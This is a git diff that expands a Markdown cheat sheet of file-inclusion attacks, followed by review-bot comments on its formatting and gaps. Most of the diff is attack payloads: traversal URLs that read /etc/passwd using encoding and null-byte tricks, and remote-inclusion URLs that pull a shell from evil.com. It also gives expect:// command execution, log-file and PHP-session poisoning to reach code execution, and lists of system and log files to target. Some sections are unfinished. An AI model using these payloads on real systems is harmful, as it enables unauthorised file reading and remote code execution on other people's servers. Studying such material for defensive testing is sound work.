diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md index 92d94b8..630d1eb 100644 --- a/File Inclusion - Path Traversal/README.md +++ b/File Inclusion - Path Traversal/README.md @@ -1,15 +1,6 @@ # Local/Remote File Inclusion The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. -## Basic LFI (null byte, double encoding and other tricks) -``` -http://example.com/index.php?page=etc/passwd -http://example.com/index.php?page=etc/passwd%00 -http://example.com/index.php?page=../../etc/passwd -http://example.com/index.php?page=%252e%252e%252f -http://example.com/index.php?page=....//....//etc/passwd -``` - Interesting files to check out : ``` /etc/issue @@ -23,6 +14,40 @@ Interesting files to check out : /proc/self/environ /proc/version /proc/cmdline +/proc/sched_debug +/proc/mounts +/proc/net/arp +/proc/net/route +/proc/net/tcp +/proc/net/udp +/var/log/apache/access.log +/var/log/apache/error.log +/var/log/httpd/error_log +/usr/local/apache/log/error_log +/usr/local/apache2/log/error_log +/var/log/vsftpd.log +/var/log/sshd.log +/var/log/mail +``` + +## Basic LFI +``` +http://example.com/index.php?page=../../../etc/passwd + +Null byte +http://example.com/index.php?page=../../../etc/passwd%00 + +Double encoding +http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd +http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 + +Path truncation +http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\. +http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd + +Filter bypass +http://example.com/index.php?page=....//....//etc/passwd +http://example.com/index.php?page=..///////..////..//////etc/passwd ``` ## Basic RFI (null byte, double encoding and other tricks) 
@@ -32,8 +57,6 @@ http://example.com/index.php?page=http://evil.com/shell.txt%00 http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt ``` - - ## LFI / RFI Wrappers LFI Wrapper rot13 and base64 - php://filter case insensitive @@ -69,7 +92,7 @@ http://example.com/index.php?page=php:expect://id http://example.com/index.php?page=php:expect://ls ``` -## Bonus XSS +Bonus XSS XSS via RFI/LFI with "" payload ``` http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+ @@ -79,6 +102,7 @@ http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbm 1. Upload a lot of shells (for example : 100) 2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too) +/proc/self/environ can also be used ## LFI to RCE via Upload 
@@ -92,8 +116,70 @@ https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assist Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py) +## LFI to RCE via input:// stream +TODO +file=php://input +(specify your payload in the POST parameters, + + + +## LFI to RCE via controlled log file +Just append your PHP code into the log file and include it. +``` +http://example.com/index.php?page=/var/log/apache/access.log +http://example.com/index.php?page=/var/log/apache/error.log +http://example.com/index.php?page=/var/log/vsftpd.log +http://example.com/index.php?page=/var/log/sshd.log +http://example.com/index.php?page=/var/log/mail +http://example.com/index.php?page=/var/log/httpd/error_log +http://example.com/index.php?page=/usr/local/apache/log/error_log +http://example.com/index.php?page=/usr/local/apache2/log/error_log +``` + +## LFI to RCE via PHP Sessions +Check if the website use PHP Session (PHPSESSID) +``` +Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/ +Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly +``` +In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files +``` +/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27. 
+user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin"; +``` +Set the cookie to +``` +login=1&user=&pass=password&lang=en_us.php +``` +Use the LFI to include the PHP session file +``` +login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 +``` + + +## Checklist - Common ways of upgrading from LFI to RCE +``` +Using file upload forms/functions +Using the PHP wrapper expect://command +Using the PHP wrapper php://file +Using the PHP wrapper php://filter +Using PHP input:// stream +Using data://text/plain;base64,command +Using /proc/self/environ +Using /proc/self/fd +Using PHP Session +Using log files with controllable input like: + /var/log/apache/access.log + /var/log/apache/error.log + /var/log/vsftpd.log + /var/log/sshd.log + /var/log/mail +``` + ## Thanks to * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) * [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/) * [Turning LFI to RFI ](https://l.avala.mp/?p=241) * [Is PHP vulnerable and under what conditions?](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html) +* [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/) +* [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html)
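Review bot: in hunk `@@ -23,6 +14,40 @@`, the "Null byte", "Double encoding" and "Path truncation" entries of the new Basic LFI block need the conditions under which they apply stated beside them: the `%00` and path-truncation forms depend on the PHP version, and the double-encoded `%252e%252e%252f` form only matters when the application URL-decodes the parameter a second time after the web server has already decoded it once. The page already links "Is PHP vulnerable and under what conditions?" in the Thanks section; pull those version conditions into this block so a reader testing their own application knows when a negative result is meaningful. Also replace the `[ADD MORE]` and `[…]` placeholders with a sentence explaining what the repeated sequence is for and how long it needs to be, otherwise they will be pasted literally.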
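Review bot: in hunk `@@ -69,7 +92,7 @@`, demoting `## Bonus XSS` to the plain line `Bonus XSS` drops the section from the heading outline while every neighbouring section keeps its `##`; this looks accidental, restore the `##`. In the same region the description `XSS via RFI/LFI with "" payload` has an empty quoted payload, most likely because the inline HTML was swallowed by the Markdown renderer; put it in a backtick code span, or state that it is the base64-decoded content of the `data:` URL shown below it, so the sentence is meaningful.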
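Review bot: in hunk `@@ -79,6 +102,7 @@`, the added line `/proc/self/environ can also be used` sits directly under item 2 of the numbered list without list markup or a blank line, so it will render as a continuation of that step rather than as an alternative to it. Make it its own numbered item or a short sub-section, say what it is an alternative to (the `/proc/$PID/fd/$FD` include) and what makes that file useful here; as written it is a bare hint that the later checklist repeats without explanation.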
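Review bot: in hunk `@@ -92,8 +116,70 @@`, the new `## LFI to RCE via input:// stream` section is committed as `TODO` with an unclosed parenthesis (`(specify your payload in the POST parameters,`) and three trailing blank lines; finish the sentence or leave the section out of this commit. The naming is also inconsistent: the heading and the checklist say `input://`, the body says `php://input`, and the checklist's `php://file` appears nowhere else on the page (the wrappers actually used above are `php://filter`, `php://input`, `expect://` and `data:`), so confirm the intended name. In the PHP Sessions section, `Set the cookie to` is followed by a request body (`login=1&user=&pass=password&lang=en_us.php`), not a cookie, and `user=` is left empty, so the reader cannot see which parameter value is written into `sess_[PHPSESSID]` and later included; the session dump shows `user|s:6:"admin"` and `pass|s:6:"admin"` while the request sends `pass=password`, so the two do not correspond. The `/var/lib/php5/` path is version-specific (say that it depends on the configured session save path), and the first line of the session dump ends with a stray `.`. Finally, the log-file section and the checklist repeat the log paths this same commit adds to "Interesting files to check out" in the first hunk; one list referenced from both places would be easier to keep in sync.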